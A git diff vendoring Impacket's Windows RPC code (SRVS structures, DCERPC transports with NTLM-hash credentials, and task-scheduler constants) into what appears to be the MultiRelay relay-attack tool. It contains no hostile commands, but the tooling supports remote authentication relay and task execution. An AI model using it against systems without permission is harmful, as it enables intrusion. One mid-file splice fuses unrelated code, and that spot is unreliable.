+ structure = (
+ ('sv1513_maxpagedmemoryusage', DWORD),
+ )
+
+class LPSERVER_INFO_1513(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1513),
+ )
+
+# 2.2.4.61 SERVER_INFO_1514
+class SERVER_INFO_1514(NDRSTRUCT):
+ structure = (
+ ('sv1514_enablesoftcompat', DWORD),
+ )
+
+class LPSERVER_INFO_1514(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1514),
+ )
+
+# 2.2.4.62 SERVER_INFO_1515
+class SERVER_INFO_1515(NDRSTRUCT):
+ structure = (
+ ('sv1515_enableforcedlogoff', DWORD),
+ )
+
+class LPSERVER_INFO_1515(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1515),
+ )
+
+# 2.2.4.63 SERVER_INFO_1516
+class SERVER_INFO_1516(NDRSTRUCT):
+ structure = (
+ ('sv1516_timesource', DWORD),
+ )
+
+class LPSERVER_INFO_1516(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1516),
+ )
+
+# 2.2.4.64 SERVER_INFO_1518
+class SERVER_INFO_1518(NDRSTRUCT):
+ structure = (
+ ('sv1518_lmannounce', DWORD),
+ )
+
+class LPSERVER_INFO_1518(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1518),
+ )
+
+# 2.2.4.65 SERVER_INFO_1523
+class SERVER_INFO_1523(NDRSTRUCT):
+ structure = (
+ ('sv1523_maxkeepsearch', DWORD),
+ )
+
+class LPSERVER_INFO_1523(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1523),
+ )
+
+# 2.2.4.66 SERVER_INFO_1528
+class SERVER_INFO_1528(NDRSTRUCT):
+ structure = (
+ ('sv1528_scavtimeout', DWORD),
+ )
+
+class LPSERVER_INFO_1528(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1528),
+ )
+
+# 2.2.4.67 SERVER_INFO_1529
+class SERVER_INFO_1529(NDRSTRUCT):
+ structure = (
+ ('sv1529_minrcvqueue', DWORD),
+ )
+
+class LPSERVER_INFO_1529(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1529),
+ )
+
+# 2.2.4.68 SERVER_INFO_1530
+class SERVER_INFO_1530(NDRSTRUCT):
+ structure = (
+ ('sv1530_minfreeworkitems', DWORD),
+ )
+
+class LPSERVER_INFO_1530(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1530),
+ )
+
+# 2.2.4.69 SERVER_INFO_1533
+class SERVER_INFO_1533(NDRSTRUCT):
+ structure = (
+ ('sv1533_maxmpxct', DWORD),
+ )
+
+class LPSERVER_INFO_1533(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1533),
+ )
+
+# 2.2.4.70 SERVER_INFO_1534
+class SERVER_INFO_1534(NDRSTRUCT):
+ structure = (
+ ('sv1534_oplockbreakwait', DWORD),
+ )
+
+class LPSERVER_INFO_1534(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1534),
+ )
+
+# 2.2.4.71 SERVER_INFO_1535
+class SERVER_INFO_1535(NDRSTRUCT):
+ structure = (
+ ('sv1535_oplockbreakresponsewait', DWORD),
+ )
+
+class LPSERVER_INFO_1535(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1535),
+ )
+
+# 2.2.4.72 SERVER_INFO_1536
+class SERVER_INFO_1536(NDRSTRUCT):
+ structure = (
+ ('sv1536_enableoplocks', DWORD),
+ )
+
+class LPSERVER_INFO_1536(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1536),
+ )
+
+# 2.2.4.73 SERVER_INFO_1538
+class SERVER_INFO_1538(NDRSTRUCT):
+ structure = (
+ ('sv1538_enablefcbopens', DWORD),
+ )
+
+class LPSERVER_INFO_1538(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1538),
+ )
+
+# 2.2.4.74 SERVER_INFO_1539
+class SERVER_INFO_1539(NDRSTRUCT):
+ structure = (
+ ('sv1539_enableraw', DWORD),
+ )
+
+class LPSERVER_INFO_1539(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1539),
+ )
+
+# 2.2.4.75 SERVER_INFO_1540
+class SERVER_INFO_1540(NDRSTRUCT):
+ structure = (
+ ('sv1540_enablesharednetdrives', DWORD),
+ )
+
+class LPSERVER_INFO_1540(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1540),
+ )
+
+# 2.2.4.76 SERVER_INFO_1541
+class SERVER_INFO_1541(NDRSTRUCT):
+ structure = (
+ ('sv1541_minfreeconnections', DWORD),
+ )
+
+class LPSERVER_INFO_1541(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1541),
+ )
+
+# 2.2.4.77 SERVER_INFO_1542
+class SERVER_INFO_1542(NDRSTRUCT):
+ structure = (
+ ('sv1542_maxfreeconnections', DWORD),
+ )
+
+class LPSERVER_INFO_1542(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1542),
+ )
+
+# 2.2.4.78 SERVER_INFO_1543
+class SERVER_INFO_1543(NDRSTRUCT):
+ structure = (
+ ('sv1543_initsesstable', DWORD),
+ )
+
+class LPSERVER_INFO_1543(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1543),
+ )
+
+# 2.2.4.79 SERVER_INFO_1544
+class SERVER_INFO_1544(NDRSTRUCT):
+ structure = (
+ ('sv1544_initconntable', DWORD),
+ )
+
+class LPSERVER_INFO_1544(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1544),
+ )
+
+# 2.2.4.80 SERVER_INFO_1545
+class SERVER_INFO_1545(NDRSTRUCT):
+ structure = (
+ ('sv1545_initfiletable', DWORD),
+ )
+
+class LPSERVER_INFO_1545(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1545),
+ )
+
+# 2.2.4.81 SERVER_INFO_1546
+class SERVER_INFO_1546(NDRSTRUCT):
+ structure = (
+ ('sv1546_initsearchtable', DWORD),
+ )
+
+class LPSERVER_INFO_1546(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1546),
+ )
+
+# 2.2.4.82 SERVER_INFO_1547
+class SERVER_INFO_1547(NDRSTRUCT):
+ structure = (
+ ('sv1547_alertschedule', DWORD),
+ )
+
+class LPSERVER_INFO_1547(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1547),
+ )
+
+# 2.2.4.83 SERVER_INFO_1548
+class SERVER_INFO_1548(NDRSTRUCT):
+ structure = (
+ ('sv1548_errorthreshold', DWORD),
+ )
+
+class LPSERVER_INFO_1548(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1548),
+ )
+
+# 2.2.4.84 SERVER_INFO_1549
+class SERVER_INFO_1549(NDRSTRUCT):
+ structure = (
+ ('sv1549_networkerrorthreshold', DWORD),
+ )
+
+class LPSERVER_INFO_1549(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1549),
+ )
+
+# 2.2.4.85 SERVER_INFO_1550
+class SERVER_INFO_1550(NDRSTRUCT):
+ structure = (
+ ('sv1550_diskspacethreshold', DWORD),
+ )
+
+class LPSERVER_INFO_1550(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1550),
+ )
+
+# 2.2.4.86 SERVER_INFO_1552
+class SERVER_INFO_1552(NDRSTRUCT):
+ structure = (
+ ('sv1552_maxlinkdelay', DWORD),
+ )
+
+class LPSERVER_INFO_1552(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1552),
+ )
+
+# 2.2.4.87 SERVER_INFO_1553
+class SERVER_INFO_1553(NDRSTRUCT):
+ structure = (
+ ('sv1553_minlinkthroughput', DWORD),
+ )
+
+class LPSERVER_INFO_1553(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1553),
+ )
+
+# 2.2.4.88 SERVER_INFO_1554
+class SERVER_INFO_1554(NDRSTRUCT):
+ structure = (
+ ('sv1554_linkinfovalidtime', DWORD),
+ )
+
+class LPSERVER_INFO_1554(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1554),
+ )
+
+# 2.2.4.89 SERVER_INFO_1555
+class SERVER_INFO_1555(NDRSTRUCT):
+ structure = (
+ ('sv1555_scavqosinfoupdatetime', DWORD),
+ )
+
+class LPSERVER_INFO_1555(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1555),
+ )
+
+# 2.2.4.90 SERVER_INFO_1556
+class SERVER_INFO_1556(NDRSTRUCT):
+ structure = (
+ ('sv1556_maxworkitemidletime', DWORD),
+ )
+
+class LPSERVER_INFO_1556(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1556),
+ )
+
+# 2.2.4.91 DISK_INFO
+class WCHAR_ARRAY(NDRSTRUCT):
+ commonHdr = (
+ ('Offset',' 1 else ''
+ else:
+ self.__endpoint = ''
+ self.__options = {}
+
+ def get_uuid(self):
+ return self.__uuid
+
+ def get_protocol_sequence(self):
+ return self.__ps
+
+ def get_network_address(self):
+ return self.__na
+
+ def set_network_address(self, addr):
+ self.__na = addr
+
+ def get_endpoint(self):
+ return self.__endpoint
+
+ def get_options(self):
+ return self.__options
+
+ def get_option(self, option_name):
+ return self.__options[option_name]
+
+ def is_option_set(self, option_name):
+ return option_name in self.__options
+
+ def unset_option(self, option_name):
+ del self.__options[option_name]
+
+ def __str__(self):
+ return DCERPCStringBindingCompose(self.__uuid, self.__ps, self.__na, self.__endpoint, self.__options)
+
+def DCERPCStringBindingCompose(uuid=None, protocol_sequence='', network_address='', endpoint='', options={}):
+ s = ''
+ if uuid:
+ s += uuid + '@'
+ s += protocol_sequence + ':'
+ if network_address:
+ s += network_address
+ if endpoint or options:
+ s += '[' + endpoint
+ if options:
+ s += ',' + ','.join([key if str(val) == '' else "=".join([key, str(val)]) for key, val in options.items()])
+ s += ']'
+
+ return s
+
+def DCERPCTransportFactory(stringbinding):
+ sb = DCERPCStringBinding(stringbinding)
+
+ na = sb.get_network_address()
+ ps = sb.get_protocol_sequence()
+ if 'ncadg_ip_udp' == ps:
+ port = sb.get_endpoint()
+ if port:
+ rpctransport = UDPTransport(na, int(port))
+ else:
+ rpctransport = UDPTransport(na)
+ elif 'ncacn_ip_tcp' == ps:
+ port = sb.get_endpoint()
+ if port:
+ rpctransport = TCPTransport(na, int(port))
+ else:
+ rpctransport = TCPTransport(na)
+ elif 'ncacn_http' == ps:
+ port = sb.get_endpoint()
+ if port:
+ rpctransport = HTTPTransport(na, int(port))
+ else:
+ rpctransport = HTTPTransport(na)
+ elif 'ncacn_np' == ps:
+ named_pipe = sb.get_endpoint()
+ if named_pipe:
+ named_pipe = named_pipe[len(r'\pipe'):]
+ rpctransport = SMBTransport(na, filename = named_pipe)
+ else:
+ rpctransport = SMBTransport(na)
+ elif 'ncalocal' == ps:
+ named_pipe = sb.get_endpoint()
+ rpctransport = LOCALTransport(filename = named_pipe)
+ else:
+ raise DCERPCException("Unknown protocol sequence.")
+
+ rpctransport.set_stringbinding(sb)
+ return rpctransport
+
+class DCERPCTransport:
+
+ DCERPC_class = DCERPC_v5
+
+ def __init__(self, remoteName, dstport):
+ self.__remoteName = remoteName
+ self.__remoteHost = remoteName
+ self.__dstport = dstport
+ self._stringbinding = None
+ self._max_send_frag = None
+ self._max_recv_frag = None
+ self._domain = ''
+ self._lmhash = ''
+ self._nthash = ''
+ self.__connect_timeout = None
+ self._doKerberos = False
+ self._username = ''
+ self._password = ''
+ self._domain = ''
+ self._aesKey = None
+ self._TGT = None
+ self._TGS = None
+ self._kdcHost = None
+ self.set_credentials('','')
+ # Strict host validation - off by default and currently only for
+ # SMBTransport
+ self._strict_hostname_validation = False
+ self._validation_allow_absent = True
+ self._accepted_hostname = ''
+
+ def connect(self):
+ raise RuntimeError('virtual function')
+ def send(self,data=0, forceWriteAndx = 0, forceRecv = 0):
+ raise RuntimeError('virtual function')
+ def recv(self, forceRecv = 0, count = 0):
+ raise RuntimeError('virtual function')
+ def disconnect(self):
+ raise RuntimeError('virtual function')
+ def get_socket(self):
+ raise RuntimeError('virtual function')
+
+ def get_connect_timeout(self):
+ return self.__connect_timeout
+ def set_connect_timeout(self, timeout):
+ self.__connect_timeout = timeout
+
+ def getRemoteName(self):
+ return self.__remoteName
+
+ def setRemoteName(self, remoteName):
+ """This method only makes sense before connection for most protocols."""
+ self.__remoteName = remoteName
+
+ def getRemoteHost(self):
+ return self.__remoteHost
+
+ def setRemoteHost(self, remoteHost):
+ """This method only makes sense before connection for most protocols."""
+ self.__remoteHost = remoteHost
+
+ def get_dport(self):
+ return self.__dstport
+ def set_dport(self, dport):
+ """This method only makes sense before connection for most protocols."""
+ self.__dstport = dport
+
+ def get_stringbinding(self):
+ return self._stringbinding
+
+ def set_stringbinding(self, stringbinding):
+ self._stringbinding = stringbinding
+
+ def get_addr(self):
+ return self.getRemoteHost(), self.get_dport()
+ def set_addr(self, addr):
+ """This method only makes sense before connection for most protocols."""
+ self.setRemoteHost(addr[0])
+ self.set_dport(addr[1])
+
+ def set_kerberos(self, flag, kdcHost = None):
+ self._doKerberos = flag
+ self._kdcHost = kdcHost
+
+ def get_kerberos(self):
+ return self._doKerberos
+
+ def get_kdcHost(self):
+ return self._kdcHost
+
+ def set_max_fragment_size(self, send_fragment_size):
+ # -1 is default fragment size: 0 (don't fragment)
+ # 0 is don't fragment
+ # other values are max fragment size
+ if send_fragment_size == -1:
+ self.set_default_max_fragment_size()
+ else:
+ self._max_send_frag = send_fragment_size
+
+ def set_hostname_validation(self, validate, accept_empty, hostname):
+ self._strict_hostname_validation = validate
+ self._validation_allow_absent = accept_empty
+ self._accepted_hostname = hostname
+
+ def set_default_max_fragment_size(self):
+ # default is 0: don't fragment.
+ # subclasses may override this method
+ self._max_send_frag = 0
+
+ def get_credentials(self):
+ return (
+ self._username,
+ self._password,
+ self._domain,
+ self._lmhash,
+ self._nthash,
+ self._aesKey,
+ self._TGT,
+ self._TGS)
+
+ def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+ self._username = username
+ self._password = password
+ self._domain = domain
+ self._aesKey = aesKey
+ self._TGT = TGT
+ self._TGS = TGS
+ if lmhash != '' or nthash != '':
+ if len(lmhash) % 2:
+ lmhash = '0%s' % lmhash
+ if len(nthash) % 2:
+ nthash = '0%s' % nthash
+ try: # just in case they were converted already
+ self._lmhash = binascii.unhexlify(lmhash)
+ self._nthash = binascii.unhexlify(nthash)
+ except:
+ self._lmhash = lmhash
+ self._nthash = nthash
+ pass
+
+ def doesSupportNTLMv2(self):
+ # By default we'll be returning the library's default. Only on SMB Transports we might be able to know it beforehand
+ return ntlm.USE_NTLMv2
+
+ def get_dce_rpc(self):
+ return DCERPC_v5(self)
+
+class UDPTransport(DCERPCTransport):
+ "Implementation of ncadg_ip_udp protocol sequence"
+
+ DCERPC_class = DCERPC_v4
+
+ def __init__(self, remoteName, dstport = 135):
+ DCERPCTransport.__init__(self, remoteName, dstport)
+ self.__socket = 0
+ self.set_connect_timeout(30)
+ self.__recv_addr = ''
+
+ def connect(self):
+ try:
+ af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_DGRAM)[0]
+ self.__socket = socket.socket(af, socktype, proto)
+ self.__socket.settimeout(self.get_connect_timeout())
+ except socket.error as msg:
+ self.__socket = None
+ raise DCERPCException("Could not connect: %s" % msg)
+
+ return 1
+
+ def disconnect(self):
+ try:
+ self.__socket.close()
+ except socket.error:
+ self.__socket = None
+ return 0
+ return 1
+
+ def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+ self.__socket.sendto(data, (self.getRemoteHost(), self.get_dport()))
+
+ def recv(self, forceRecv = 0, count = 0):
+ buffer, self.__recv_addr = self.__socket.recvfrom(8192)
+ return buffer
+
+ def get_recv_addr(self):
+ return self.__recv_addr
+
+ def get_socket(self):
+ return self.__socket
+
+class TCPTransport(DCERPCTransport):
+ """Implementation of ncacn_ip_tcp protocol sequence"""
+
+ def __init__(self, remoteName, dstport = 135):
+ DCERPCTransport.__init__(self, remoteName, dstport)
+ self.__socket = 0
+ self.set_connect_timeout(30)
+
+ def connect(self):
+ af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
+ self.__socket = socket.socket(af, socktype, proto)
+ try:
+ self.__socket.settimeout(self.get_connect_timeout())
+ self.__socket.connect(sa)
+ except socket.error as msg:
+ self.__socket.close()
+ raise DCERPCException("Could not connect: %s" % msg)
+ return 1
+
+ def disconnect(self):
+ try:
+ self.__socket.close()
+ except socket.error:
+ self.__socket = None
+ return 0
+ return 1
+
+ def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+ if self._max_send_frag:
+ offset = 0
+ while 1:
+ toSend = data[offset:offset+self._max_send_frag]
+ if not toSend:
+ break
+ self.__socket.send(toSend)
+ offset += len(toSend)
+ else:
+ self.__socket.send(data)
+
+ def recv(self, forceRecv = 0, count = 0):
+ if count:
+ buffer = b''
+ while len(buffer) < count:
+ buffer += self.__socket.recv(count-len(buffer))
+ else:
+ buffer = self.__socket.recv(8192)
+ return buffer
+
+ def get_socket(self):
+ return self.__socket
+
+class HTTPTransport(TCPTransport, RPCProxyClient):
+ """Implementation of ncacn_http protocol sequence"""
+
+ def __init__(self, remoteName=None, dstport=593):
+ self._useRpcProxy = False
+ self._rpcProxyUrl = None
+ self._transport = TCPTransport
+ self._version = RPC_OVER_HTTP_v2
+
+ DCERPCTransport.__init__(self, remoteName, dstport)
+ RPCProxyClient.__init__(self, remoteName, dstport)
+ self.set_connect_timeout(30)
+
+ def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+ return self._transport.set_credentials(self, username, password,
+ domain, lmhash, nthash, aesKey, TGT, TGS)
+
+ def rpc_proxy_init(self):
+ self._useRpcProxy = True
+ self._transport = RPCProxyClient
+
+ def set_rpc_proxy_url(self, url):
+ self.rpc_proxy_init()
+ self._rpcProxyUrl = urlparse(url)
+
+ def get_rpc_proxy_url(self):
+ return urlunparse(self._rpcProxyUrl)
+
+ def set_stringbinding(self, set_stringbinding):
+ DCERPCTransport.set_stringbinding(self, set_stringbinding)
+
+ if self._stringbinding.is_option_set("RpcProxy"):
+ self.rpc_proxy_init()
+
+ rpcproxy = self._stringbinding.get_option("RpcProxy").split(":")
+
+ if rpcproxy[1] == '443':
+ self.set_rpc_proxy_url('https://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+ elif rpcproxy[1] == '80':
+ self.set_rpc_proxy_url('http://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+ else:
+ # 2.1.2.1
+ # RPC over HTTP always uses port 80 for HTTP traffic and port 443 for HTTPS traffic.
+ # But you can use set_rpc_proxy_url method to set any URL / query you want.
+ raise DCERPCException("RPC Proxy port must be 80 or 443")
+
+ def connect(self):
+ if self._useRpcProxy == False:
+ # Connecting directly to the ncacn_http port
+ #
+ # Here we using RPC over HTTPv1 instead complex RPC over HTTP v2 syntax
+ # RPC over HTTP v2 here can be implemented in the future
+ self._version = RPC_OVER_HTTP_v1
+
+ TCPTransport.connect(self)
+
+ # Reading legacy server response
+ data = self.get_socket().recv(8192)
+
+ if data != b'ncacn_http/1.0':
+ raise DCERPCException("%s:%s service is not ncacn_http" % (self.__remoteName, self.__dstport))
+ else:
+ RPCProxyClient.connect(self)
+
+ def send(self, data, forceWriteAndx=0, forceRecv=0):
+ return self._transport.send(self, data, forceWriteAndx, forceRecv)
+
+ def recv(self, forceRecv=0, count=0):
+ return self._transport.recv(self, forceRecv, count)
+
+ def get_socket(self):
+ if self._useRpcProxy == False:
+ return TCPTransport.get_socket(self)
+ else:
+ raise DCERPCException("This method is not supported for RPC Proxy connections")
+
+ def disconnect(self):
+ return self._transport.disconnect(self)
+
+class SMBTransport(DCERPCTransport):
+ """Implementation of ncacn_np protocol sequence"""
+
+ def __init__(self, remoteName, dstport=445, filename='', username='', password='', domain='', lmhash='', nthash='',
+ aesKey='', TGT=None, TGS=None, remote_host='', smb_connection=0, doKerberos=False, kdcHost=None):
+ DCERPCTransport.__init__(self, remoteName, dstport)
+ self.__socket = None
+ self.__tid = 0
+ self.__filename = filename
+ self.__handle = 0
+ self.__pending_recv = 0
+ self.set_credentials(username, password, domain, lmhash, nthash, aesKey, TGT, TGS)
+ self._doKerberos = doKerberos
+ self._kdcHost = kdcHost
+
+ if remote_host != '':
+ self.setRemoteHost(remote_host)
+
+ if smb_connection == 0:
+ self.__existing_smb = False
+ else:
+ self.__existing_smb = True
+ self.set_credentials(*smb_connection.getCredentials())
+
+ self.__prefDialect = None
+ self.__smb_connection = smb_connection
+ self.set_connect_timeout(30)
+
+ def preferred_dialect(self, dialect):
+ self.__prefDialect = dialect
+
+ def setup_smb_connection(self):
+ if not self.__smb_connection:
+ self.__smb_connection = SMBConnection(self.getRemoteName(), self.getRemoteHost(), sess_port=self.get_dport(),
+ preferredDialect=self.__prefDialect, timeout=self.get_connect_timeout())
+ if self._strict_hostname_validation:
+ self.__smb_connection.setHostnameValidation(self._strict_hostname_validation, self._validation_allow_absent, self._accepted_hostname)
+
+ def connect(self):
+ # Check if we have a smb connection already setup
+ if self.__smb_connection == 0:
+ self.setup_smb_connection()
+ if self._doKerberos is False:
+ self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
+ else:
+ self.__smb_connection.kerberosLogin(self._username, self._password, self._domain, self._lmhash,
+ self._nthash, self._aesKey, kdcHost=self._kdcHost, TGT=self._TGT,
+ TGS=self._TGS)
+ self.__tid = self.__smb_connection.connectTree('IPC$')
+ self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
+ self.__socket = self.__smb_connection.getSMBServer().get_socket()
+ return 1
+
+ def disconnect(self):
+ self.__smb_connection.disconnectTree(self.__tid)
+ # If we created the SMB connection, we close it, otherwise
+ # that's up for the caller
+ if self.__existing_smb is False:
+ self.__smb_connection.logoff()
+ self.__smb_connection.close()
+ self.__smb_connection = 0
+
+ def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+ if self._max_send_frag:
+ offset = 0
+ while 1:
+ toSend = data[offset:offset+self._max_send_frag]
+ if not toSend:
+ break
+ self.__smb_connection.writeFile(self.__tid, self.__handle, toSend, offset = offset)
+ offset += len(toSend)
+ else:
+ self.__smb_connection.writeFile(self.__tid, self.__handle, data)
+ if forceRecv:
+ self.__pending_recv += 1
+
+ def recv(self, forceRecv = 0, count = 0 ):
+ if self._max_send_frag or self.__pending_recv:
+ # _max_send_frag is checked because it's the same condition we checked
+ # to decide whether to use write_andx() or send_trans() in send() above.
+ if self.__pending_recv:
+ self.__pending_recv -= 1
+ return self.__smb_connection.readFile(self.__tid, self.__handle, bytesToRead = self._max_recv_frag)
+ else:
+ return self.__smb_connection.readFile(self.__tid, self.__handle)
+
+ def get_smb_connection(self):
+ return self.__smb_connection
+
+ def set_smb_connection(self, smb_connection):
+ self.__smb_connection = smb_connection
+ self.set_credentials(*smb_connection.getCredentials())
+ self.__existing_smb = True
+
+ def get_smb_server(self):
+ # Raw Access to the SMBServer (whatever type it is)
+ return self.__smb_connection.getSMBServer()
+
+ def get_socket(self):
+ return self.__socket
+
+ def doesSupportNTLMv2(self):
+ return self.__smb_connection.doesSupportNTLMv2()
+
+class LOCALTransport(DCERPCTransport):
+ """
+ Implementation of ncalocal protocol sequence, not the same
+ as ncalrpc (I'm not doing LPC just opening the local pipe)
+ """
+
+ def __init__(self, filename = ''):
+ DCERPCTransport.__init__(self, '', 0)
+ self.__filename = filename
+ self.__handle = 0
+
+ def connect(self):
+ if self.__filename.upper().find('PIPE') < 0:
+ self.__filename = '\\PIPE\\%s' % self.__filename
+ self.__handle = os.open('\\\\.\\%s' % self.__filename, os.O_RDWR|os.O_BINARY)
+ return 1
+
+ def disconnect(self):
+ os.close(self.__handle)
+
+ def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+ os.write(self.__handle, data)
+
+ def recv(self, forceRecv = 0, count = 0 ):
+ data = os.read(self.__handle, 65535)
+ return data
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py
new file mode 100644
index 0000000..c916c96
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py
@@ -0,0 +1,799 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-TSCH] ITaskSchedulerService Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL, GUID, PSYSTEMTIME, SYSTEMTIME
+from impacket.structure import Structure
+from impacket import hresult_errors, system_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_TSCHS = uuidtup_to_bin(('86D35949-83C9-4044-B424-DB363231FD0C','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ elif key & 0xffff in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
+ return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE = 0x1
+TASK_FLAG_DELETE_WHEN_DONE = 0x2
+TASK_FLAG_DISABLED = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE = 0x10
+TASK_FLAG_KILL_ON_IDLE_END = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED = 0x100
+TASK_FLAG_HIDDEN = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME = 0x800
+TASK_FLAG_SYSTEM_REQUIRED = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x2000
+
+# 2.3.9 TASK_LOGON_TYPE
+TASK_LOGON_NONE = 0
+TASK_LOGON_PASSWORD = 1
+TASK_LOGON_S4U = 2
+TASK_LOGON_INTERACTIVE_TOKEN = 3
+TASK_LOGON_GROUP = 4
+TASK_LOGON_SERVICE_ACCOUNT = 5
+TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD = 6
+
+# 2.3.13 TASK_STATE
+TASK_STATE_UNKNOWN = 0
+TASK_STATE_DISABLED = 1
+TASK_STATE_QUEUED = 2
+TASK_STATE_READY = 3
+TASK_STATE_RUNNING = 4
+
+# 2.4.1 FIXDLEN_DATA
+SCHED_S_TASK_READY = 0x00041300
+SCHED_S_TASK_RUNNING = 0x00041301
+SCHED_S_TASK_NOT_SCHEDULED = 0x00041301
+
+# 2.4.2.11 Triggers
+TASK_TRIGGER_FLAG_HAS_END_DATE = 0
+TASK_TRIGGER_FLAG_KILL_AT_DURATION_END = 0
+TASK_TRIGGER_FLAG_DISABLED = 0
+
+# ToDo: Change this to enums
+ONCE = 0
+DAILY = 1
+WEEKLY = 2
+MONTHLYDATE = 3
+MONTHLYDOW = 4
+EVENT_ON_IDLE = 5
+EVENT_AT_SYSTEMSTART = 6
+EVENT_AT_LOGON = 7
+
+SUNDAY = 0
+MONDAY = 1
+TUESDAY = 2
+WEDNESDAY = 3
+THURSDAY = 4
+FRIDAY = 5
+SATURDAY = 6
+
+JANUARY = 1
+FEBRUARY = 2
+MARCH = 3
+APRIL = 4
+MAY = 5
+JUNE = 6
+JULY = 7
+AUGUST = 8
+SEPTEMBER = 9
+OCTOBER = 10
+NOVEMBER = 11
+DECEMBER = 12
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+FIRST_WEEK = 1
+SECOND_WEEK = 2
+THIRD_WEEK = 3
+FOURTH_WEEK = 4
+LAST_WEEK = 5
+
+# 2.3.12 TASK_NAMES
+TASK_NAMES = LPWSTR
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+TASK_VALIDATE_ONLY = 1<<(31-31)
+TASK_CREATE = 1<<(31-30)
+TASK_UPDATE = 1<<(31-29)
+TASK_DISABLE = 1<<(31-28)
